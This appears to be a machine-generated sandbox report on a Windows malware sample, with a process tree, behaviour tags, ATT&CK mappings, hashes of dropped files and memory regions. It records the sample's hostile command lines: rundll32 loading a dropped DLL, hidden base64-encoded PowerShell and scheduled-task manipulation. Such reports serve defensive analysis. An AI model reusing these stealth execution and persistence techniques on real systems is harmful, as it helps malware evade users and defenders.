C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WZpWNMsDzSAcKsSA\BupCloOy\kNXfDAH.dll",#1 /vPddidfn 5254032⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WZpWNMsDzSAcKsSA\BupCloOy\kNXfDAH.dll",#1 /vPddidfn 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MRaTohzfdszDuijXP"4⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {B4C713D2-1B8C-4FA2-8595-06BA6C626F4E} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\NNMAoTKMcAkAC\EVwNPJE.xmlFilesize
2KB
MD556300799fc647e9e67d9f628379f362d
SHA19db1287feadc101e614ffe9f2e65f0956b00072c
SHA256e125a2beef1f6778614f9750f5b55919cb14b9186abe8040c00b127d3b562d4d
SHA51221951979390445163d192b2602eb844b8e4cd2d13fc1894b122e7fedf4085b032981e6740b63d79802896b43f066a0fabe26bd8b90a0385138affe48c1b5b78d
-
C:\Program Files (x86)\bBBSFQQZU\cJShuxr.xmlFilesize
2KB
MD5e3264e63c0caae73f6d623742168ddfe
SHA1f8c67db40398e664a3a0f7d7a9f7fa9d5cf6dd54
SHA256f13d5f7c78244d8ed4729209cc4b44d28a5c0f08a7177972e1bc2c7a03114d06
SHA5128d9d74073cab3fef935c18cd8abbd92b0ff042d9a0c5456ae7799259e5b74d7c0e45662479ad1d7b5de3893cf199f92d53d861401cac391e1dbab8d044804b9b
-
C:\Program Files (x86)\rPikKiIbwrQGukIChiR\xjRusjO.xmlFilesize
2KB
MD5249f0295a442151557553b20ca423b47
SHA1bc001c991a1c12a65e777afd0c0a45b94b0eee6d
SHA25601355960dc7e7c0bfac4f2d774f80cb054408c605f5640590da47b26086d13c9
SHA512a125f5b5baa5001f4b10adc15adabdf8f66053f5c737295b4a507f2db3c51d24c1db8e20a169426e4fce82d3180ad2a615fd5a21a18f130d70c0ec08dd0c62d9
-
C:\Program Files (x86)\rUfZlqUIdWiU2\EoqhHtL.xmlFilesize
2KB
MD5bff83435fe1419be9fb9fcdc46c18608
SHA14c5baef039a73a3c2e515461d2509f151308b95d
SHA2569662de849b5265fbc7d63025022667740ce64261a2de818e2bc24c686a293614
SHA512042d7492f3f6946af9ded1ce68f37aaf9de23a1f97ff5883f01d9fd0f486b4772a0f2c26b0b2093b48899c761ca1b3e7f78febaeb4c54700e4caa0a91c43f0bc
-
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpiFilesize
2.0MB
MD592d46c428b987b0ce38033e386f62aeb
SHA15d9ae6d9d85a14a6e5316772c5f86c6f29eb5bf2
SHA256d5dc980abc05b8c7951e6f90def3cc873aa6b3cd7bbe69be90357de66b8f8bc1
SHA5127dcf0d4a61bd562a68481cd07907d8a2fc4446d7962676be95d37ba8271c201820b1c646cf7031a76761defc6d5417c794c913d457164d72f958ed68e19802af
-
C:\ProgramData\fHdtCMTPryqSDgVB\dklcvEh.xmlFilesize
2KB
MD5b9033c18d995f262c870e18f144b614b
SHA1a22b320d843d2cdcf743bff439da36dcd178fe57
SHA256992bfbb22456abc1756ba27b3abf4e5cdba865ce24adbedebe262441de2bd2e1
SHA512bbf7e9f9231b6a9170b37bd9f6566ee407a6aeb6216a02960e14a458dd6c92d2192960b8f9425e819e70c2e5fc3efb6775f66f351e9805d94eb86c7d504a4e81
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
10KB
MD544aaae6ee80daa955d0b5eed4b2cedca
SHA147b82dddc846adea6f91b6eb22b41246f890061f
SHA256df2274d83e96e436fdd349cf3e92452519bca610b537ad675a6cce7ba2765685
SHA51202f24fd91ce704b43022ef44fa31b3037cc94f0794b80dcb2e3d7074e4613891992953cc2cf4a7fdd17102db08097eacd78bfd062d07bdee226ab075b1183138
-
C:\Users\Admin\AppData\Local\Temp\7zS79F.tmp\Install.exeFilesize
6.4MB
MD509425d4767dc7685af0e67ae87fd663c
SHA1f256f1faff822cecbedf93c2d9a193fc249a1aba
SHA2561164190934b26a9195d87c60573a82808dd29248a57b72a2d0ae15c8512d5ecb
SHA512d0a63d1f8322ce9c4050ba7fea134489de02dc31c38861ba9b780bf85bc99198a61308018a5c259cf052f43ef92efce867b91a41fba2c6d6cfdbd867f9a1cd90
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD59c24c99981833480626ddde6d32caa84
SHA15af42a8ffe8f272b21a0084298c9e639f7d8cfd7
SHA256a0f021542f71bb7e562e44c9f76c1695ff1dbde402fe896fdef772b8b71c84fe
SHA5127ac12bebf513da95c57a616ed12209cd8ac7bfe472ea8367149a02be6f427352787b1fe6212ad058515941d29af6a92fec986dd284889d8ffab679f9e47e98a5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LA4R3GZXX9TNLC3RX228.tempFilesize
7KB
MD57a576c2231ae53486ea99bb7102cb8c2
SHA1a3505834035f4cfae8688f45ee17e94f0f9bdc23
SHA2562b05b0cd37225734d9c7a468cdb4aa2d7c064d8add36e4941cc06fcadcee7720
SHA512f4f8ea418207a24cda5d03ec8cb86253253541e53c2e6b119398161967c1d235e81f2e299e0ddc618ae831003857ee8a01bbf703dd48685b2af7eb5c677067ea
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ty9peokp.default-release\prefs.jsFilesize
7KB
MD5163e6d040c5e32d8019d6112ed7d6bf0
SHA13b9d38db7751e417b3d2d09ad682fe0d607fd273
SHA2567d9ba7078bac9764b54450808f45a9fa92007a37e6e91385187e7f05258de769
SHA5125b8f80f723047bdd0f1bee6fd4d29b426d1dcac6fe51ca0955788fc2564ec5ee7c3b1456ba01eb95031774ef24e3f0d7d3166300f28c83cf08609284be71a588
-
C:\Windows\Temp\WZpWNMsDzSAcKsSA\BupCloOy\kNXfDAH.dllFilesize
6.5MB
MD52c5315f48e9b097d2c447e016743854f
SHA184006269f2b54df8bef71d46364bd82946b24759
SHA256233a6dfcb0ea347aed469bac784313ce0fb0dbc2ce84b5f3b3561d4741b03dc2
SHA512efd65e08582051bf7ef3795f7d0718aab625ea1500eaae19b0a665807b697e81a0e1dd580885765f364ab3e763ed913a19cbbe27327bc45ce0c1a0aeb65ce4ec
-
C:\Windows\Temp\WZpWNMsDzSAcKsSA\YpxQpBsK\ekduWzVPfypDrZBU.wsfFilesize
9KB
MD59c9bbe9b63946e069276760656c24ff5
SHA15f35af8b5bed2afd76a808ddfede3fceccc55226
SHA256f7192f4faca2596673ffbcec2b99ac321ecc9301dd717194a7bdf026203c473d
SHA5121e8d4a2412e62a47790c47ef466cb1f04c9b407592c125ffc1a7028997079a60db7201c7ad08b7d47d5e2b5688fea233ac464663c1f8ab354dc560fd849eaf75
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
6KB
MD5fa4ab2b7c89c5943f88f8ae0b12f3d42
SHA1dd383010ae707003f995855b1995865672879c7c
SHA2566cc8c13a3692843414fbf6563cf5873685dd77f7e9a1988c0388a45d8e45f47a
SHA512d57ee1376efc7173e5e3db30e8879bda4a82c51d2098d007d7ab4b1ccd767a051ff4587598a96d50a9bd2271de41a074c2dc1a72eb729cee905d35ec8877fbaf
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\7zS9E0.tmp\Install.exeFilesize
6.6MB
MD5c459c807bebcbb6553ff3388b249a9fd
SHA16e428b6c77c966e33c5c0e321d722b57bd3bf975
SHA2569c3372c448ccebbe7b771c24c207a0ae0e145a25d0e96f5ffb0559ff5571154b
SHA5127641130d16107aa5bdf16f39a6f9e6404230376bae4a9489b0b9462218075c4a0cea35cff3b434c6a352f05f49aca4a3f71839acf16cbe278ac49235ca6291cf
-
memory/1132-60-0x0000000001E70000-0x0000000001E78000-memory.dmpFilesize
32KB
-
memory/1132-59-0x000000001B890000-0x000000001BB72000-memory.dmpFilesize
2.9MB
-
memory/1204-349-0x00000000013F0000-0x0000000004FBB000-memory.dmpFilesize
59.8MB
-
memory/1312-49-0x000000001B4D0000-0x000000001B7B2000-memory.dmpFilesize
2.9MB
-
memory/1312-50-0x0000000002710000-0x0000000002718000-memory.dmpFilesize
32KB
-
memory/1896-22-0x0000000002400000-0x0000000002AA5000-memory.dmpFilesize
6.6MB
-
memory/2504-94-0x0000000002190000-0x0000000002215000-memory.dmpFilesize
532KB
-
memory/2504-311-0x0000000002A70000-0x0000000002AF8000-memory.dmpFilesize
544KB
-
memory/2504-127-0x0000000001190000-0x00000000011F0000-memory.dmpFilesize
384KB
-
memory/2504-324-0x0000000003C40000-0x0000000003D12000-memory.dmpFilesize
840KB
-
memory/2504-82-0x0000000010000000-0x0000000013BCB000-memory.dmpFilesize
59.8MB
-
memory/2504-355-0x0000000001350000-0x00000000019F5000-memory.dmpFilesize
6.6MB
-
memory/2504-356-0x0000000001350000-0x00000000019F5000-memory.dmpFilesize
6.6MB
-
memory/2504-76-0x0000000001350000-0x00000000019F5000-memory.dmpFilesize
6.6MB
-
memory/2568-39-0x0000000010000000-0x0000000013BCB000-memory.dmpFilesize
59.8MB
-
memory/2568-80-0x00000000003A0000-0x0000000000A45000-memory.dmpFilesize
6.6MB
-
memory/2568-61-0x00000000003A0000-0x0000000000A45000-memory.dmpFilesize
6.6MB
-
memory/2568-38-0x00000000003A0000-0x0000000000A45000-memory.dmpFilesize
6.6MB
-
memory/3044-37-0x0000000001270000-0x0000000001915000-memory.dmpFilesize
6.6MB
-
memory/3044-34-0x00000000009F0000-0x0000000001095000-memory.dmpFilesize
6.6MB
-
memory/3044-27-0x0000000010000000-0x0000000013BCB000-memory.dmpFilesize
59.8MB
-
memory/3044-25-0x0000000001270000-0x0000000001915000-memory.dmpFilesize
6.6MB
-
memory/3044-24-0x00000000009F0000-0x0000000001095000-memory.dmpFilesize
6.6MB
-
memory/3044-23-0x00000000009F0000-0x0000000001095000-memory.dmpFilesize
6.6MB